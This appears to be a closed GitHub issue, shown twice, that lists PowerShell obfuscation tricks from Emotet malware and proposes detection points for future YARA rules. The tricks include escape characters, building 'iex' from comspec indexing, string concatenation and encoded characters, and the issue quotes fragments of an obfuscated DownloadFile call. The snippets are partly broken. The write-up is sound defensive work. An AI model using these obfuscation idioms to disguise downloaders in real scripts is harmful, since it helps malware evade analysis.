Closed Omodaka9375 closed 3 years ago
These are some of the techniques used in Emotet PowerShell to obfuscate the code to make the analysis difficult.
Using ` or ^ (escape character) in front of a character with no change in the result when starting PowerShell from cmd.exe:
$YYU."Do
OadFI
i
Using iex alias to invoke the PowerShell command:
$env:comSpeC[4,26,25]-JoIn'') --> iex
“PowerShell ${ENV:comspeC}[4,26,25]-join’ ‘ item (env:Opg).value)”
Strings are concatenate using ‘+’ to reduce readability:
Strings encoded with ascii e.g [chaR]34:
File downloader or string downloader in macro
Detection point: ` , ^ or + for concatination Detection point: env:comspec[4,26,25] Detection point: -rep /rep Detection point: DowloadFile, DownloadScript calls or http/s string in args
We'll implement these things using YARA in the future from v1 onwards.
These are some of the techniques used in Emotet PowerShell to obfuscate the code to make the analysis difficult.
Using ` or ^ (escape character) in front of a character with no change in the result when starting PowerShell from cmd.exe:
$YYU."Do
WnlOadFI
le"($asfc."ToStri
Ng"(), $SDC);Using iex alias to invoke the PowerShell command:
$env:comSpeC[4,26,25]-JoIn'') --> iex
“PowerShell ${ENV:comspeC}[4,26,25]-join’ ‘ item (env:Opg).value)”
Strings are concatenate using ‘+’ to reduce readability:
Strings encoded with ascii e.g [chaR]34:
File downloader or string downloader in macro
Detection point: ` , ^ or + for concatination Detection point: env:comspec[4,26,25] Detection point: -rep /rep Detection point: DowloadFile, DownloadScript calls or http/s string in args